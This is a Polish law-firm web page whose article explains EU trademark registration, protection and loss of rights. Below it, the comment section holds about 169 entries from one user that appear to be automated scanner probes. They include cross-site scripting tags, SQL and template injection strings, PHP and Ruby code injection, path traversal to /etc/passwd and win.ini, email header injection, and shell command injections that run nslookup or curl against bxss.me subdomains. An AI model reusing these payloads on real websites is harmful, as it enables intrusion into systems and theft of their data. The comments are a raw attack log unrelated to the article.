Proton Office

Znak towarowy w Unii Europejskiej

Artykuł

|

Znak towarowy w Unii Europejskiej, zwany także znakiem handlowym lub marką, odgrywa kluczową rolę w ochronie własności intelektualnej i budowaniu rozpoznawalności produktów oraz usług na rynku. W Unii Europejskiej (UE) istnieją szczególne przepisy dotyczące rejestracji i ochrony znaków towarowych, które mają na celu zapewnienie jednolitego i skutecznego systemu regulacyjnego.

Rejestracja znaku towarowego w Unii Europejskiej stanowi proces, który umożliwia właścicielowi ochronę znaku na terenie wszystkich państw członkowskich UE poprzez jedną procedurę. Jest to szczególnie korzystne dla firm i przedsiębiorstw działających na rynku europejskim, ponieważ eliminuje konieczność rejestracji oddzielnych znaków w poszczególnych krajach.

Znak towarowy może przyjąć różne formy, w tym słowa, grafiki, kombinacje kolorów, dźwięki oraz trójwymiarowe kształty. Istotne jest, aby znak miał cechy odróżniające, czyli pozwalał na jednoznaczną identyfikację towarów lub usług pochodzących od konkretnego przedsiębiorcy.

Proces rejestracji znaku towarowego w UE obejmuje kilka kluczowych etapów. Po pierwsze, konieczne jest złożenie wniosku rejestracyjnego w Urzędzie Unii Europejskiej ds. Własności Intelektualnej (EUIPO). Wniosek powinien zawierać informacje dotyczące właściciela znaku, jego reprezentacji graficznej oraz zakresu towarów lub usług, dla których ma być zarejestrowany.

Po złożeniu wniosku następuje ocena formalna i merytoryczna przez organ rejestracyjny. W przypadku spełnienia wszystkich wymogów formalnych oraz braku sprzeciwów ze strony osób trzecich, znak towarowy może zostać zarejestrowany. Rejestracja umożliwia właścicielowi korzystanie z ochrony prawa do znaku wobec innych podmiotów na terenie UE.

Ochrona znaku towarowego w Unii Europejskiej obejmuje między innymi prawo do wyłącznego korzystania z oznaczenia wobec identycznych lub podobnych towarów lub usług, które mogą wprowadzać w błąd konsumentów co do ich pochodzenia. Właściciel znaku może również podejmować działania prawne przeciwko osobom naruszającym jego prawa, w tym domagając się zaniechania naruszeń oraz uzyskiwania odszkodowania za poniesione szkody.

Jednakże, ochrona znaku towarowego w Unii Europejskiej nie trwa bez ograniczeń i może ulec utracie w pewnych okolicznościach. Na przykład, jeśli znak nie jest używany przez określony czas w odniesieniu do towarów lub usług, dla których został zarejestrowany, może dojść do utraty prawa do jego ochrony. Ponadto, znak towarowy może być unieważniony na skutek wniosku o unieważnienie złożonego przez osobę trzecią, która udowodni, że znak nie spełniał warunków rejestracji lub naruszał prawa innych podmiotów.

Istnieją również pewne wyjątki od ochrony znaku towarowego, które obejmują między innymi sytuacje, gdy korzystanie z oznaczenia jest niezbędne do wskazania cech towaru lub usługi, takich jak ich rodzaj, jakość, przeznaczenie czy geograficzne pochodzenie.

Wniosek o rejestrację znaku towarowego w Unii Europejskiej wymaga starannej analizy oraz odpowiedniego przygotowania dokumentacji, aby zapewnić jak największą skuteczność i ochronę praw. Właściciele znaków towarowych powinni również monitorować rynek w celu wykrywania potencjalnych naruszeń oraz podejmować niezbędne działania w przypadku ich wystąpienia.

Wniosek o rejestrację znaku towarowego w Unii Europejskiej stanowi istotny krok dla przedsiębiorstw i firm, które dążą do budowania marki oraz ochrony swoich interesów na europejskim rynku. Świadomość przepisów regulujących znaki towarowe oraz skuteczna strategia ochrony własności intelektualnej są kluczowe dla sukcesu przedsiębiorstw działających w warunkach globalnej konkurencji.

 

Ochrona znaku towarowego w Unii Europejskiej ma istotne znaczenie dla konkurencyjności przedsiębiorstw oraz dla konsumentów, którzy korzystają z różnorodności produktów i usług dostępnych na rynku. Dzięki systemowi rejestracji znaków towarowych, klienci mogą identyfikować produkty pochodzące od konkretnych producentów, co przyczynia się do budowy zaufania i lojalności wobec marek.

Wspólnotowy znak towarowy Unii Europejskiej (EU trademark) jest symbolem jednolitego rynku, który umożliwia swobodny przepływ towarów i usług między państwami członkowskimi. Rejestracja znaku towarowego na poziomie UE eliminuje konieczność prowadzenia oddzielnych procedur rejestracyjnych w poszczególnych krajach członkowskich, co upraszcza i usprawnia proces ochrony własności intelektualnej dla przedsiębiorstw operujących na europejskim rynku.

W dzisiejszej globalnej gospodarce, w której innowacje i kreatywność są kluczowymi czynnikami sukcesu, ochrona znaku towarowego staje się coraz bardziej istotna. Przedsiębiorstwa inwestują znaczne środki w rozwój marki i budowanie rozpoznawalności na rynku, dlatego też skuteczna ochrona znaku towarowego stanowi niezbędny element strategii biznesowych.

Jednocześnie, proces rejestracji znaku towarowego w Unii Europejskiej wymaga starannego przygotowania i analizy, aby zapewnić jego skuteczną ochronę. Właściciele znaków towarowych powinni przeprowadzić kompleksową ocenę ryzyka, w tym sprawdzenie istniejących znaków towarowych oraz innych praw własności intelektualnej, które mogą kolidować z zamierzeniami rejestracyjnymi.

Ochrona znaku towarowego to nie tylko kwestia prawa, ale również element budowania wartości firmy oraz relacji z klientami. Silna marka może stanowić istotny czynnik różnicujący na konkurencyjnym rynku oraz wpływać na decyzje zakupowe konsumentów.

W związku z tym, właściciele znaków towarowych powinni śledzić zmiany na rynku, reagować na nowe wyzwania oraz dostosowywać swoje strategie ochronne do zmieniających się warunków biznesowych i prawnych. Współpraca z profesjonalistami z zakresu prawa własności intelektualnej może być kluczowa dla skutecznej ochrony znaku towarowego i osiągnięcia celów biznesowych przedsiębiorstwa.

 


0.0
Tagi:
Dodaj nowy komentarz
Komentarze 169
JYupWMLW :
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
18 lutego 2024 22:33
JYupWMLW :
@@jQV8j
18 lutego 2024 22:33
JYupWMLW :
1'"
18 lutego 2024 22:33
JYupWMLW :
-1 OR 3+149-149-1=0+0+0+1
18 lutego 2024 22:32
JYupWMLW :
-1 OR 2+149-149-1=0+0+0+1
18 lutego 2024 22:32
JYupWMLW :
1*1
18 lutego 2024 22:32
JYupWMLW :
1*1
18 lutego 2024 22:32
JYupWMLW :
1*1
18 lutego 2024 22:32
JYupWMLW :
1*1
18 lutego 2024 22:32
JYupWMLW :
dfb[[${98991*97996}]]xca
18 lutego 2024 22:31
JYupWMLW :
dfb{{98991*97996}}xca
18 lutego 2024 22:30
JYupWMLW :
rRCDDjCL
18 lutego 2024 22:30
JYupWMLW :
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
18 lutego 2024 22:29
JYupWMLW :
<th:t="${dfb}#foreach
18 lutego 2024 22:28
JYupWMLW :
<%={{={@{#{${dfb}}%>
18 lutego 2024 22:27
JYupWMLW :
1<ifRAme sRc=9683.com></IfRamE>
18 lutego 2024 22:26
JYupWMLW :
bfg3635%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3635
18 lutego 2024 22:25
JYupWMLW :
1<WLCUCO>ZHT3K[!+!]</WLCUCO>
18 lutego 2024 22:25
JYupWMLW :
19229267
18 lutego 2024 22:24
JYupWMLW :
1TJ4mo
<ScRiPt >dCUr(9191)</ScRiPt>
18 lutego 2024 22:24
JYupWMLW :
'"()&%<zzz><ScRiPt >Tf1l(9859)</ScRiPt>
18 lutego 2024 22:24
JYupWMLW :
1}body{zzz:Expre/**/SSion(dCUr(9853))}
18 lutego 2024 22:24
JYupWMLW :
1'"()&%<zzz><ScRiPt >Tf1l(9756)</ScRiPt>
18 lutego 2024 22:24
JYupWMLW :
'.print(md5(31337)).'
18 lutego 2024 22:24
JYupWMLW :
<a HrEF=jaVaScRiPT:>
18 lutego 2024 22:24
JYupWMLW :
<!--
18 lutego 2024 22:24
JYupWMLW :
;(nslookup -q=cname hitswabritcore9e8a.bxss.me||curl hitswabritcore9e8a.bxss.me)|(nslookup -q=cname hitswabritcore9e8a.bxss.me||curl hitswabritcore9e8a.bxss.me)&(nslookup -q=cname hitswabritcore9e8a.bxss.me||curl hitswabritcore9e8a.bxss.me)
18 lutego 2024 22:24
JYupWMLW :
${@print(md5(31337))}\
18 lutego 2024 22:24
JYupWMLW :
`(nslookup -q=cname hitlrqahqlrvd2fcc4.bxss.me||curl hitlrqahqlrvd2fcc4.bxss.me)`
18 lutego 2024 22:24
JYupWMLW :
xfs.bxss.me
18 lutego 2024 22:24
JYupWMLW :
bxss.me
18 lutego 2024 22:24
JYupWMLW :
${@print(md5(31337))}
18 lutego 2024 22:24
JYupWMLW :
1"||sleep(27*1000)*frmbdr||"
18 lutego 2024 22:24
JYupWMLW :
<a HrEF=http://xss.bxss.me></a>
18 lutego 2024 22:24
JYupWMLW :
|(nslookup -q=cname hitgerfmwggam261df.bxss.me||curl hitgerfmwggam261df.bxss.me)
18 lutego 2024 22:24
JYupWMLW :
";print(md5(31337));$a="
18 lutego 2024 22:24
JYupWMLW :
1'||sleep(27*1000)*rkqayp||'
18 lutego 2024 22:24
JYupWMLW :
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
18 lutego 2024 22:24
JYupWMLW :
bxss.me/t/xss.html?%00
18 lutego 2024 22:24
JYupWMLW :
'+'A'.concat(70-3).concat(22*4).concat(120).concat(65).concat(118).concat(66)+(require'socket'
Socket.gethostbyname('hitbt'+'zbspzyytc516b.bxss.me.')[3].to_s)+'
18 lutego 2024 22:24
JYupWMLW :
c:/windows/win.ini
18 lutego 2024 22:24
JYupWMLW :
&(nslookup -q=cname hitjgxfqenull38e0e.bxss.me||curl hitjgxfqenull38e0e.bxss.me)&'\"`0&(nslookup -q=cname hitjgxfqenull38e0e.bxss.me||curl hitjgxfqenull38e0e.bxss.me)&`'
18 lutego 2024 22:24
JYupWMLW :
1"&&sleep(27*1000)*lahmcu&&"
18 lutego 2024 22:24
JYupWMLW :
';print(md5(31337));$a='
18 lutego 2024 22:24
JYupWMLW :
"+"A".concat(70-3).concat(22*4).concat(117).concat(68).concat(100).concat(76)+(require"socket"
Socket.gethostbyname("hitge"+"dymfnrtef44a7.bxss.me.")[3].to_s)+"
18 lutego 2024 22:24
JYupWMLW :
HttP://bxss.me/t/xss.html?%00
18 lutego 2024 22:24
JYupWMLW :
/etc/shells
18 lutego 2024 22:24
JYupWMLW :
".gethostbyname(lc("hitwe"."fjjghwvi90466.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(70).chr(99).chr(75)."
18 lutego 2024 22:24
JYupWMLW :
^(#$!@#$)(()))******
18 lutego 2024 22:24
JYupWMLW :
1<input autofocus onfocus=dCUr(9615)>
18 lutego 2024 22:24
JYupWMLW :
&nslookup -q=cname hitevadnvpobh89e8d.bxss.me&'\"`0&nslookup -q=cname hitevadnvpobh89e8d.bxss.me&`'
18 lutego 2024 22:24
JYupWMLW :
http://bxss.me/t/fit.txt%3F.jpg
18 lutego 2024 22:24
JYupWMLW :
1'&&sleep(27*1000)*vdrbsp&&'
18 lutego 2024 22:24
JYupWMLW :
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
18 lutego 2024 22:24
JYupWMLW :
$(nslookup -q=cname hitgtwrzfqufja38a7.bxss.me||curl hitgtwrzfqufja38a7.bxss.me)
18 lutego 2024 22:24
JYupWMLW :
!(()&&!|*|*|
18 lutego 2024 22:24
JYupWMLW :
'.gethostbyname(lc('hitdo'.'hxfhjlgx36f85.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(87).chr(118).chr(72).'
18 lutego 2024 22:24
JYupWMLW :
Http://bxss.me/t/fit.txt
18 lutego 2024 22:24
JYupWMLW :
./1
18 lutego 2024 22:24
JYupWMLW :
'"()
18 lutego 2024 22:24
JYupWMLW :
(nslookup -q=cname hitdapispkopf33662.bxss.me||curl hitdapispkopf33662.bxss.me))
18 lutego 2024 22:24
JYupWMLW :
1&n919388=v920489
18 lutego 2024 22:24
JYupWMLW :
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
18 lutego 2024 22:24
JYupWMLW :
../1
18 lutego 2024 22:24
JYupWMLW :
1&lt;ScRiPt&gt;dCUr(9063)&lt;/sCripT&gt;
18 lutego 2024 22:24
JYupWMLW :
1|echo qoxxsm$()\ lzkasc\nz^xyu||a #' |echo qoxxsm$()\ lzkasc\nz^xyu||a #|" |echo qoxxsm$()\ lzkasc\nz^xyu||a #
18 lutego 2024 22:24
JYupWMLW :
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
18 lutego 2024 22:24
JYupWMLW :
${10000315+9999271}
18 lutego 2024 22:23
JYupWMLW :
|echo yhvlqk$()\ tcwlwp\nz^xyu||a #' |echo yhvlqk$()\ tcwlwp\nz^xyu||a #|" |echo yhvlqk$()\ tcwlwp\nz^xyu||a #
18 lutego 2024 22:23
JYupWMLW :
file:///etc/passwd
18 lutego 2024 22:23
JYupWMLW :
1\u003CScRiPt\dCUr(9022)\u003C/sCripT\u003E
18 lutego 2024 22:23
JYupWMLW :
1&echo rqjueb$()\ apvygh\nz^xyu||a #' &echo rqjueb$()\ apvygh\nz^xyu||a #|" &echo rqjueb$()\ apvygh\nz^xyu||a #
18 lutego 2024 22:23
JYupWMLW :
to@example.com>%0d%0abcc:009247.5190-5734.5190.ab87c.19771.2@bxss.me
18 lutego 2024 22:23
JYupWMLW :
"+response.write(9730737*9361826)+"
18 lutego 2024 22:23
JYupWMLW :
../../../../../../../../../../../../../../windows/win.ini
18 lutego 2024 22:23
JYupWMLW :
1<esi:include src="http://bxss.me/rpb.png"/>
18 lutego 2024 22:23
JYupWMLW :
&echo utzhuo$()\ eloapg\nz^xyu||a #' &echo utzhuo$()\ eloapg\nz^xyu||a #|" &echo utzhuo$()\ eloapg\nz^xyu||a #
18 lutego 2024 22:23
JYupWMLW :
'+response.write(9730737*9361826)+'
18 lutego 2024 22:23
JYupWMLW :
1%0abcc:009247.5190-5733.5190.ab87c.19771.2@bxss.me
18 lutego 2024 22:23
JYupWMLW :
../../../../../../../../../../../../../../etc/passwd
18 lutego 2024 22:23
JYupWMLW :
%31%3C%53%63%52%69%50%74%20%3E%64%43%55%72%289305%29%3C%2F%73%43%72%69%70%54%3E
18 lutego 2024 22:23
JYupWMLW :
2l2wXDwJ
18 lutego 2024 22:23
JYupWMLW :
response.write(9730737*9361826)
18 lutego 2024 22:23
JYupWMLW :
echo mjgdgw$()\ gcxkqz\nz^xyu||a #' &echo mjgdgw$()\ gcxkqz\nz^xyu||a #|" &echo mjgdgw$()\ gcxkqz\nz^xyu||a #
18 lutego 2024 22:23
JYupWMLW :
1p4YyhdiO
18 lutego 2024 22:23
JYupWMLW :
1<img/src=">" onerror=alert(9001)>
18 lutego 2024 22:23
JYupWMLW :
1<img src=xyz OnErRor=dCUr(9679)>
18 lutego 2024 22:23
JYupWMLW :
1<img src=//xss.bxss.me/t/dot.gif onload=dCUr(9210)>
18 lutego 2024 22:23
JYupWMLW :
1<body onload=dCUr(9509)>
18 lutego 2024 22:23
JYupWMLW :
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9476'>
18 lutego 2024 22:23
JYupWMLW :
1<isindex type=image src=1 onerror=dCUr(9676)>
18 lutego 2024 22:22
JYupWMLW :
1<ScRiPt
>dCUr(9170)</ScRiPt>
18 lutego 2024 22:22
JYupWMLW :
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9698></ScRiPt>
18 lutego 2024 22:22
JYupWMLW :
1<ScRiPt
>dCUr(9581)</ScRiPt>
18 lutego 2024 22:22
JYupWMLW :
1<ScR<ScRiPt>IpT>dCUr(9422)</sCr<ScRiPt>IpT>
18 lutego 2024 22:22
JYupWMLW :
1<script>dCUr(9920)</script>9920
18 lutego 2024 22:22
JYupWMLW :
1<script>dCUr(9529)</script>
18 lutego 2024 22:22
JYupWMLW :
1<WMBYAJ>LIA7X[!+!]</WMBYAJ>
18 lutego 2024 22:21
JYupWMLW :
1<ScRiPt >dCUr(9421)</ScRiPt>
18 lutego 2024 22:21
JYupWMLW :
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
18 lutego 2024 22:21
JYupWMLW :
dfb__${98991*97996}__::.x
18 lutego 2024 22:21
JYupWMLW :
dfb[[${98991*97996}]]xca
18 lutego 2024 22:21
JYupWMLW :
dfb{{98991*97996}}xca
18 lutego 2024 22:21
JYupWMLW :
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
18 lutego 2024 22:21
JYupWMLW :
<th:t="${dfb}#foreach
18 lutego 2024 22:21
JYupWMLW :
<%={{={@{#{${dfb}}%>
18 lutego 2024 22:20
JYupWMLW :
bfg10034<s1﹥s2ʺs3ʹhjl10034
18 lutego 2024 22:20
JYupWMLW :
19265768
18 lutego 2024 22:20
JYupWMLW :
'"()&%<zzz><ScRiPt >dCUr(9877)</ScRiPt>
18 lutego 2024 22:20
JYupWMLW :
1'"()&%<zzz><ScRiPt >dCUr(9615)</ScRiPt>
18 lutego 2024 22:20
JYupWMLW :
;(nslookup -q=cname hitbnxvxsgyimc5e43.bxss.me||curl hitbnxvxsgyimc5e43.bxss.me)|(nslookup -q=cname hitbnxvxsgyimc5e43.bxss.me||curl hitbnxvxsgyimc5e43.bxss.me)&(nslookup -q=cname hitbnxvxsgyimc5e43.bxss.me||curl hitbnxvxsgyimc5e43.bxss.me)
18 lutego 2024 22:19
JYupWMLW :
`(nslookup -q=cname hitpupmqtwchz7df8c.bxss.me||curl hitpupmqtwchz7df8c.bxss.me)`
18 lutego 2024 22:19
JYupWMLW :
|(nslookup -q=cname hitgplwrqbktf36dcd.bxss.me||curl hitgplwrqbktf36dcd.bxss.me)
18 lutego 2024 22:19
JYupWMLW :
&(nslookup -q=cname hitasneyaotxt3806d.bxss.me||curl hitasneyaotxt3806d.bxss.me)&'\"`0&(nslookup -q=cname hitasneyaotxt3806d.bxss.me||curl hitasneyaotxt3806d.bxss.me)&`'
18 lutego 2024 22:19
JYupWMLW :
&nslookup -q=cname hitfecinpxaqhd8d35.bxss.me&'\"`0&nslookup -q=cname hitfecinpxaqhd8d35.bxss.me&`'
18 lutego 2024 22:19
JYupWMLW :
'.print(md5(31337)).'
18 lutego 2024 22:19
JYupWMLW :
$(nslookup -q=cname hitgpvgfhhdrde031e.bxss.me||curl hitgpvgfhhdrde031e.bxss.me)
18 lutego 2024 22:19
JYupWMLW :
(nslookup -q=cname hitpvdgupqrscbc7a8.bxss.me||curl hitpvdgupqrscbc7a8.bxss.me))
18 lutego 2024 22:19
JYupWMLW :
${@print(md5(31337))}\
18 lutego 2024 22:19
JYupWMLW :
xfs.bxss.me
18 lutego 2024 22:19
JYupWMLW :
${@print(md5(31337))}
18 lutego 2024 22:19
JYupWMLW :
1|echo qtmtkf$()\ irqnkv\nz^xyu||a #' |echo qtmtkf$()\ irqnkv\nz^xyu||a #|" |echo qtmtkf$()\ irqnkv\nz^xyu||a #
18 lutego 2024 22:19
JYupWMLW :
";print(md5(31337));$a="
18 lutego 2024 22:19
JYupWMLW :
|echo ouyifa$()\ nbtgvf\nz^xyu||a #' |echo ouyifa$()\ nbtgvf\nz^xyu||a #|" |echo ouyifa$()\ nbtgvf\nz^xyu||a #
18 lutego 2024 22:19
JYupWMLW :
';print(md5(31337));$a='
18 lutego 2024 22:18
JYupWMLW :
1"||sleep(27*1000)*spetgq||"
18 lutego 2024 22:18
JYupWMLW :
1&echo exkowx$()\ valibi\nz^xyu||a #' &echo exkowx$()\ valibi\nz^xyu||a #|" &echo exkowx$()\ valibi\nz^xyu||a #
18 lutego 2024 22:18
JYupWMLW :
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
18 lutego 2024 22:18
JYupWMLW :
1'||sleep(27*1000)*uwqwku||'
18 lutego 2024 22:18
JYupWMLW :
&echo csrhxp$()\ fhixhr\nz^xyu||a #' &echo csrhxp$()\ fhixhr\nz^xyu||a #|" &echo csrhxp$()\ fhixhr\nz^xyu||a #
18 lutego 2024 22:18
JYupWMLW :
1"&&sleep(27*1000)*wregjj&&"
18 lutego 2024 22:18
JYupWMLW :
echo mjpfiw$()\ pmyqcm\nz^xyu||a #' &echo mjpfiw$()\ pmyqcm\nz^xyu||a #|" &echo mjpfiw$()\ pmyqcm\nz^xyu||a #
18 lutego 2024 22:18
JYupWMLW :
bxss.me
18 lutego 2024 22:18
JYupWMLW :
1'&&sleep(27*1000)*lumtkd&&'
18 lutego 2024 22:18
JYupWMLW :
c:/windows/win.ini
18 lutego 2024 22:18
JYupWMLW :
<!--
18 lutego 2024 22:18
JYupWMLW :
/etc/shells
18 lutego 2024 22:18
JYupWMLW :
'"()
18 lutego 2024 22:18
JYupWMLW :
http://bxss.me/t/fit.txt?.jpg
18 lutego 2024 22:18
JYupWMLW :
comments/.
18 lutego 2024 22:18
JYupWMLW :
Http://bxss.me/t/fit.txt
18 lutego 2024 22:18
JYupWMLW :
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
18 lutego 2024 22:18
JYupWMLW :
comments
18 lutego 2024 22:18
JYupWMLW :
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
18 lutego 2024 22:18
JYupWMLW :
comments
18 lutego 2024 22:18
JYupWMLW :
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
18 lutego 2024 22:18
JYupWMLW :
'+'A'.concat(70-3).concat(22*4).concat(103).concat(71).concat(115).concat(90)+(require'socket'
Socket.gethostbyname('hitaa'+'rfkilzfz48368.bxss.me.')[3].to_s)+'
18 lutego 2024 22:18
JYupWMLW :
"+"A".concat(70-3).concat(22*4).concat(122).concat(67).concat(121).concat(86)+(require"socket"
Socket.gethostbyname("hitqm"+"mvxgrwwv232e5.bxss.me.")[3].to_s)+"
18 lutego 2024 22:18
JYupWMLW :
^(#$!@#$)(()))******
18 lutego 2024 22:18
JYupWMLW :
!(()&&!|*|*|
18 lutego 2024 22:18
JYupWMLW :
bxss.me/t/xss.html?%00
18 lutego 2024 22:18
JYupWMLW :
".gethostbyname(lc("hitys"."xhhvtbvk10cac.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(74).chr(113).chr(89)."
18 lutego 2024 22:18
JYupWMLW :
HttP://bxss.me/t/xss.html?%00
18 lutego 2024 22:18
JYupWMLW :
./1
18 lutego 2024 22:18
JYupWMLW :
'.gethostbyname(lc('hitff'.'jwlbyguu9599a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(83).chr(99).chr(76).'
18 lutego 2024 22:18
JYupWMLW :
../1
18 lutego 2024 22:18
JYupWMLW :
file:///etc/passwd
18 lutego 2024 22:18
JYupWMLW :
../../../../../../../../../../../../../../windows/win.ini
18 lutego 2024 22:18
JYupWMLW :
../../../../../../../../../../../../../../etc/passwd
18 lutego 2024 22:18
JYupWMLW :
1&n915480=v920923
18 lutego 2024 22:18
JYupWMLW :
to@example.com>
bcc:009247.5190-5139.5190.8134d.19771.2@bxss.me
18 lutego 2024 22:18
JYupWMLW :
${10000425+10000314}
18 lutego 2024 22:18
JYupWMLW :
1<esi:include src="http://bxss.me/rpb.png"/>
18 lutego 2024 22:18
JYupWMLW :
1
bcc:009247.5190-5138.5190.8134d.19771.2@bxss.me
18 lutego 2024 22:18
JYupWMLW :
"+response.write(9301130*9805277)+"
18 lutego 2024 22:17
JYupWMLW :
'+response.write(9301130*9805277)+'
18 lutego 2024 22:17
JYupWMLW :
qLvsiM8c
18 lutego 2024 22:17
JYupWMLW :
response.write(9301130*9805277)
18 lutego 2024 22:17
JYupWMLW :
1gt2nMpNO
18 lutego 2024 22:14